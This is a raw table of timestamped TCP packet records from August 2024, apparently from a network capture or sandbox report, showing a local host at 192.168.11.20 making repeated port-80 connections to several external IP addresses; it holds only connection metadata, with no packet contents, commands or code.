                                                Aug 27, 2024 07:58:30.906661034 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:30.906685114 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:30.906780958 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:30.906820059 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:30.906955957 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:30.907129049 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:30.907293081 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:30.907356024 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:30.907409906 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:30.907474041 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:30.907634974 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:30.907912970 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:30.907963991 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.251665115 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.251729012 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.252571106 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.252655983 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.252708912 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.252809048 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.252965927 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.276694059 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:31.621869087 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.622033119 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:31.622034073 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:31.651559114 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:31.967175007 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.967241049 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:31.967467070 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:31.967468023 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:31.996668100 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.312419891 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.312444925 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.312666893 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.565346956 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565469027 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565534115 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565567017 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.565660000 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565670013 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.565670013 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.565789938 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565849066 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.565888882 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565979958 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.565992117 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566065073 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.566071987 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566138983 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.566186905 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566186905 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566225052 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.566276073 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.566315889 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566394091 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.566394091 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.657388926 CEST8049844103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:32.657603025 CEST4984480192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:32.747067928 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.091995955 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:33.092155933 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.097264051 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.443058014 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:33.565958977 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:33.566029072 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:33.566433907 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.568234921 CEST4984580192.168.11.20103.247.8.53
                                                Aug 27, 2024 07:58:33.913106918 CEST8049845103.247.8.53192.168.11.20
                                                Aug 27, 2024 07:58:46.892843962 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:47.025749922 CEST804984696.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:47.025976896 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:47.033322096 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:47.168495893 CEST804984696.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:47.168515921 CEST804984696.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:47.168776989 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:48.538552999 CEST4984680192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:49.555830002 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:49.689187050 CEST804984796.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:49.689426899 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:49.696741104 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:49.833240032 CEST804984796.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:49.833306074 CEST804984796.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:49.833549023 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:51.209806919 CEST4984780192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.227188110 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.359945059 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.360198975 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.368853092 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.501888037 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.501967907 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502022982 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502069950 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502094984 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.502115965 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502167940 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502188921 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.502216101 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502243042 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.502264023 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502319098 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.502429962 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.502638102 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.503048897 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.553195953 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.635456085 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635535002 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635586977 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635636091 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635673046 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.635797024 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.635813951 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635862112 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:52.635910034 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.635977030 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.636157990 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.636382103 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.636507988 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769048929 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769136906 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769190073 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769236088 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769490004 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769565105 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769615889 CEST804984896.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:52.769802094 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:53.881172895 CEST4984880192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:54.898489952 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.031167984 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:55.031323910 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.036791086 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.172287941 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:55.172358036 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:55.172425032 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:58:55.172729015 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.174640894 CEST4984980192.168.11.2096.126.123.244
                                                Aug 27, 2024 07:58:55.307234049 CEST804984996.126.123.244192.168.11.20
                                                Aug 27, 2024 07:59:00.467009068 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:00.771187067 CEST804985023.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:00.771368980 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:00.778865099 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:01.082706928 CEST804985023.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:01.196021080 CEST804985023.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:01.196227074 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:02.285360098 CEST4985080192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:02.589329958 CEST804985023.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:03.302678108 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:03.617105007 CEST804985123.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:03.617299080 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:03.624777079 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:03.939194918 CEST804985123.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:04.039649963 CEST804985123.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:04.039854050 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:05.128439903 CEST4985180192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:05.442982912 CEST804985123.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.146147013 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.465392113 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.465523005 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.475186110 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.475239038 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.475286007 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.794516087 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.794689894 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.794873953 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.794960976 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.795053005 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795090914 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:06.795223951 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795273066 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795361996 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795527935 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.795697927 CEST4985280192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:06.894383907 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114212990 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114281893 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114406109 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114556074 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.114680052 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.115036964 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.115164995 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.115288973 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:07.115411043 CEST804985223.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:09.004656076 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:09.316817999 CEST804985323.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:09.317027092 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:09.322065115 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:09.633965969 CEST804985323.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:09.734426975 CEST804985323.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:09.734579086 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:09.735177040 CEST4985380192.168.11.2023.231.158.3
                                                Aug 27, 2024 07:59:10.046680927 CEST804985323.231.158.3192.168.11.20
                                                Aug 27, 2024 07:59:14.858779907 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:14.959480047 CEST8049854172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:14.959712982 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:14.967185020 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:15.067923069 CEST8049854172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:15.080246925 CEST8049854172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:15.080780029 CEST8049854172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:15.080980062 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:16.469738960 CEST4985480192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:17.487138987 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:17.589615107 CEST8049855172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:17.589904070 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:17.597347021 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:17.697865009 CEST8049855172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:17.714504004 CEST8049855172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:17.715033054 CEST8049855172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:17.715230942 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:19.109810114 CEST4985580192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.127186060 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.227832079 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.228001118 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.236553907 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.236601114 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.236653090 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.336937904 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337029934 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337133884 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337152958 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337276936 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337284088 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337285042 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337403059 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337455034 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337524891 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337533951 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337542057 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337625027 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337795973 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.337799072 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.337987900 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.351413012 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.351555109 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.351788998 CEST4985680192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:20.437750101 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.437835932 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.437846899 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438052893 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438060999 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438178062 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438186884 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438302994 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438312054 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438427925 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438551903 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438560009 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438677073 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.438801050 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.439065933 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.439189911 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.439198971 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.439315081 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:20.452044010 CEST8049856172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.767256975 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:22.867805004 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.868005037 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:22.873028994 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:22.973582983 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.989088058 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.989166021 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.989526033 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:22.991497993 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:23.092014074 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:28.106396914 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:28.206969976 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.207184076 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:28.217051983 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:28.317711115 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.482920885 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.482933998 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.483072996 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:28.483932018 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.484055042 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:29.732459068 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:30.749953985 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:30.851111889 CEST8049859172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:30.851330042 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:30.858716965 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:30.959625006 CEST8049859172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:31.128812075 CEST8049859172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:31.128827095 CEST8049859172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:31.128997087 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:31.129313946 CEST8049859172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:31.129465103 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:32.372498035 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.390003920 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.490771055 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.491003990 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.499574900 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.499593973 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.499641895 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.600245953 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600332022 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600384951 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600502014 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600505114 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.600656033 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600718975 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.600753069 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600866079 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600874901 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600883007 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.600891113 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.601011992 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.601186991 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.701311111 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.701409101 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.701421022 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.701494932 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.701580048 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.701615095 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.701627016 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.701711893 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.701880932 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.701911926 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.701972008 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702105999 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702117920 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702214956 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702342033 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702351093 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702395916 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702404976 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702413082 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702423096 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702461958 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702471018 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.702584982 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802249908 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802376032 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802505970 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802608013 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802624941 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802639961 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802751064 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802851915 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.802974939 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.803092957 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.944830894 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.944861889 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.944869041 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:33.945009947 CEST4986080192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:33.945275068 CEST8049860172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:34.045703888 CEST8049860172.67.166.145192.168.11.20
